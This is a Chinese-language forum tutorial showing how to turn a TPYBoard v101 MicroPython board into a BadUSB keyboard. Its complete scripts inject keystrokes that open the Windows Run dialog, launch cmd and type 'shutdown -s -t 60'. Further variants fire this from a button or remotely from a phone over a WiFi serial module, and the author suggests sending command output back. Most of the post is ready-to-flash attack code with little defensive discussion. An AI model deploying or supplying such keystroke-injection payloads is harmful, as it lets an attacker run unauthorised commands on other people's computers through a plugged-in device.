|
|
本帖最后由 bodasister 于 2016-7-21 09:57 編輯
原創(chuàng)版權(quán)歸
所有,轉(zhuǎn)載必須以鏈接形式注明作者和原始出處。 本文以TPYBoardv101開發(fā)板為例講解了利用micropython進(jìn)行BadUSB的usb-HID設(shè)備測試的主要方法,使用mt7681模塊進(jìn)行了一個簡單的實驗,實現(xiàn)了手機(jī)搖控鍵盤輸入的測試。
0x01引言
Micropython即運行在微控制器上的Python,只要你懂python3.x,就可以讓你像使用arduino那樣進(jìn)行硬件開發(fā)。隨著micropython的發(fā)布,已經(jīng)有越來越多的人研究和利用其進(jìn)行項目開發(fā)。本人也進(jìn)行了一些研究,發(fā)現(xiàn)利用python進(jìn)行操作確實很方便,很簡單。目前支持micropython的開發(fā)板有很多,如pyboard、pyMagic、TPYBoard等。
pyboard
pyMagic
TPYBoard
最近從網(wǎng)上搞了一塊tpyboard V10進(jìn)行了一下研究,特別是對其自身的USB-HID功能進(jìn)行了測試,令人驚喜的是,你可以在僅懂python的情況下,進(jìn)行HID攻擊的姿態(tài)測試。具體TPYBoardv101的使用方法,請參micropytho網(wǎng)站
0x02 TPYBoardV101模擬鍵盤
該板子的使用方法入門,本文中略過,有興趣的可以查看其網(wǎng)micropytho。TPYBoardv101中,在進(jìn)行鍵盤模擬時,每次發(fā)送了8個字符,只要搞清楚了這8個字符的含義,就能夠進(jìn)行HID模擬了。
鍵盤發(fā)送的8個字符:BYTE1 BYTE2 BYTE3 BYTE4 BYTE5 BYTE6 BYTE7 BYTE8。其中BYTE1用來實現(xiàn)功能鍵:
BYTE1 --
|--bit0: Left Control 按下時為1
|--bit1: Left Shift按下時為1
|--bit2: Left Alt按下時為1
|--bit3: Left GUI按下時為1
|--bit4: Right Control按下時為1
|--bit5: Right Shift按下時為1
|--bit6: Right Alt按下時為1
|--bit7: Right GUI按下時為1
BYTE3到BYTE8是具體按鍵(見0x06附件),如:
按下left shift + a ,則發(fā)送 0x02,0x00,0x04,0x00,0x00,0x00,0x00,0x00。
這里以按下left GUI+R來具體講解實現(xiàn)過程。
第一步:修改boot.py文件,代碼如下:
- import machine
- import pyb
- #pyb.main('main.py') # main script to run after this one
- #pyb.usb_mode('CDC+MSC') # act as a serial and a storage device
- pyb.usb_mode('CDC+HID',hid=pyb.hid_keyboard)
第二步,修改main.py文件,代碼如下:
- # main.py -- put your code here!
- hid=pyb.USB_HID()
- def release_key_once():
- buf = bytearray(8) # report is 8 bytes long
- buf[2] = 0
- hid.send(buf) # key released
- pyb.delay(10)
- def press_key_once(key):
- buf = bytearray(8) # report is 8 bytes long
- buf[2] = key
- hid.send(buf) # key released
- pyb.delay(10)
- def press_2key(key1,key2):
- buf = bytearray(8) # report is 8 bytes long
- buf[0] = key1
- buf[2] = key2
- hid.send(buf) # key released
- pyb.delay(10)
- def release_2key():
- buf = bytearray(8) # report is 8 bytes long
- buf[0] = 0
- buf[2] = 0
- hid.send(buf) # key released
- pyb.delay(10)
- pyb.delay(1000) #開始加入1秒延時
- press_2key(0x08,0x15)#具體鍵值見附錄部分
- release_2key()
第三步,安全退出TPYBoardv101,然后按一下RST鍵,可以看到一秒后“運行”窗口彈出。
0x03 簡單的HID測試
測試打開“運行”窗口,輸入cmd,然后彈出cmd后,輸入shutdown -s -t 60 ,即60秒后自動關(guān)機(jī)。
Main.py的代碼如下:
- # main.py -- put your code here!
- hid=pyb.USB_HID()
- def release_key_once():
- buf = bytearray(8) # report is 8 bytes long
- buf[2] = 0
- hid.send(buf) # key released
- pyb.delay(10)
- def press_key_once(key):
- buf = bytearray(8) # report is 8 bytes long
- buf[2] = key
- hid.send(buf) # key released
- pyb.delay(10)
- def press_2key(key1,key2):
- buf = bytearray(8) # report is 8 bytes long
- buf[0] = key1
- buf[2] = key2
- hid.send(buf) # key released
- pyb.delay(10)
- def release_2key():
- buf = bytearray(8) # report is 8 bytes long
- buf[0] = 0
- buf[2] = 0
- hid.send(buf) # key released
- pyb.delay(10)
- pyb.delay(1000) #開始加入1秒延時
- press_2key(0x08,0x15)#具體鍵值見附錄部分
- release_2key()
- pyb.delay(100)
- a=[0x06,0x10,0x07,0x28] #cmd+enter
- for i in a:
- press_key_once(i)
- release_key_once()
- pyb.delay(1000)
- #shutdown -s -t 60 + enter
- a=[0x16,0x0b,0x18,0x17,0x07,0x12,0x1a,0x11,0x2c,0x2d,0x16,0x2c,0x2d,0x17,0x2c,0x23,0x27,0x28]
- for i in a:
- press_key_once(i)
- release_key_once()
- pyb.delay(1000)
程序運行的效果是:當(dāng)開發(fā)板插入電腦后,會首先彈出“運行”窗口,然后在該窗口里輸入cmd,此時彈出cmd,并在其中輸入shutdown -s -t 60和回車,然后電腦在1分鐘后關(guān)機(jī)。
0x04 DIY一鍵關(guān)機(jī)
TPYBoardv101帶著一個usr按鍵,可以利用這個按鍵來制作一鍵關(guān)機(jī)功能。當(dāng)板子程序運行后,按下usr按鍵,產(chǎn)生中斷,led3閃一下,進(jìn)行關(guān)機(jī)操作。具體代碼如下:
- # main.py -- put your code here!
- import pyb
- FLAG=0 #flag標(biāo)記,當(dāng)為1時,關(guān)機(jī)
- def release_key_once():
- buf = bytearray(8) # report is 8 bytes long
- buf[2] = 0
- hid.send(buf) # key released
- pyb.delay(10)
- def press_key_once(key):
- buf = bytearray(8) # report is 8 bytes long
- buf[2] = key
- hid.send(buf) # key released
- pyb.delay(10)
- def press_2key(key1,key2):
- buf = bytearray(8) # report is 8 bytes long
- buf[0] = key1
- buf[2] = key2
- hid.send(buf) # key released
- pyb.delay(10)
- def release_2key():
- buf = bytearray(8) # report is 8 bytes long
- buf[0] = 0
- buf[2] = 0
- hid.send(buf) # key released
- pyb.delay(10)
- def shutdownpc():
- global FLAG
- pyb.LED(3).on()
- FLAG=1
- pyb.delay(300)
- pyb.LED(3).off()
- hid=pyb.USB_HID()
- sw=pyb.Switch()
- sw.callback(shutdownpc)
- while(1): #led2閃爍表示板子已經(jīng)正常工作
- pyb.LED(2).toggle()
- pyb.delay(300)
- print(FLAG)
- if FLAG==1:
- pyb.delay(1000) #開始加入1秒延時
- press_2key(0x08,0x15)#具體鍵值見附錄部分
- release_2key()
- pyb.delay(100)
- a=[0x06,0x10,0x07,0x28] #cmd+enter
- for i in a:
- press_key_once(i)
- release_key_once()
- pyb.delay(1000)
- #shutdown -s -t 60 + enter
- a=[0x16,0x0b,0x18,0x17,0x07,0x12,0x1a,0x11,0x2c,0x2d,0x16,0x2c,0x2d,0x17,0x2c,0x23,0x27,0x28]
- for i in a:
- press_key_once(i)
- release_key_once()
- pyb.delay(1000)
- FLAG=0
0x05 用手機(jī)搖控鍵盤輸入
這個實驗中,我使用了MT7681wifi模塊,該模塊可以直接進(jìn)行串口透傳。將MT7681與TPYBoardv101進(jìn)行連接,接線示意圖,見下圖。這里用的是TPYBoardv101的UART3,串口波特率115200。具體代碼如下:
- # main.py -- put your code here!
- import pyb
- FLAG=0
- def release_key_once():
- buf = bytearray(8) # report is 8 bytes long
- buf[2] = 0
- hid.send(buf) # key released
- pyb.delay(10)
- def press_key_once(key):
- buf = bytearray(8) # report is 8 bytes long
- buf[2] = key
- hid.send(buf) # key released
- pyb.delay(10)
- def press_2key(key1,key2):
- buf = bytearray(8) # report is 8 bytes long
- buf[0] = key1
- buf[2] = key2
- hid.send(buf) # key released
- pyb.delay(10)
- def release_2key():
- buf = bytearray(8) # report is 8 bytes long
- buf[0] = 0
- buf[2] = 0
- hid.send(buf) # key released
- pyb.delay(10)
- def shutdownpc():
- global FLAG
- pyb.LED(3).on()
- FLAG=1
- pyb.delay(1000)
- pyb.LED(3).off()
- def getchars():
- global FLAG
- pyb.LED(3).on()
- FLAG=2
- pyb.delay(1000)
- pyb.LED(3).off()
- hid=pyb.USB_HID()
- sw=pyb.Switch()
- sw.callback(shutdownpc)
- u1=pyb.UART(3,115200)
- u1.init(115200, bits=8, parity=None, stop=1)
- u1.write('Hello world!')
- buf=''
- #print(buf)
- while(1): #led2閃爍表示板子已經(jīng)正常工作
- buf=u1.readline()
- print(buf)
- if buf==b's':
- getchars()
- pyb.LED(2).toggle()
- pyb.delay(1300)
- print(FLAG)
- if FLAG==1:
- pyb.delay(1000) #開始加入1秒延時
- press_2key(0x08,0x15)#具體鍵值見附錄部分
- release_2key()
- pyb.delay(100)
- a=[0x06,0x10,0x07,0x28] #cmd+enter
- for i in a:
- press_key_once(i)
- release_key_once()
- pyb.delay(1000)
- #shutdown -s -t 60 + enter
- a=[0x16,0x0b,0x18,0x17,0x07,0x12,0x1a,0x11,0x2c,0x2d,0x16,0x2c,0x2d,0x17,0x2c,0x23,0x27,0x28]
- for i in a:
- press_key_once(i)
- release_key_once()
- pyb.delay(1000)
- FLAG=0
- if FLAG==2:
- pyb.delay(1000) #開始加入1秒延時
- press_2key(0x08,0x15)#具體鍵值見附錄部分
- release_2key()
- pyb.delay(100)
- a=[0x11,0x12,0x17,0x08,0x13,0x04,0x07,0x28] #notepad+enter
- for i in a:
- press_key_once(i)
- release_key_once()
- pyb.delay(1000)
- FLAG=0
到這一步,可以看到,手機(jī)就像一個搖控鍵盤一樣,可以直接來控制鍵盤了。只需要在程序中再豐富一下,就可以做個很不錯的手機(jī)鍵盤出來。同時,因為可以通過串口返回數(shù)據(jù),所以可以在電腦端寫個上位機(jī),這樣就可以把電腦操作的返回值返回回來。具體的擴(kuò)展功能大家自己想吧,就只說到這里了。
0x06附件
micropython的主要鍵值如下:
|
評分
-
查看全部評分
|
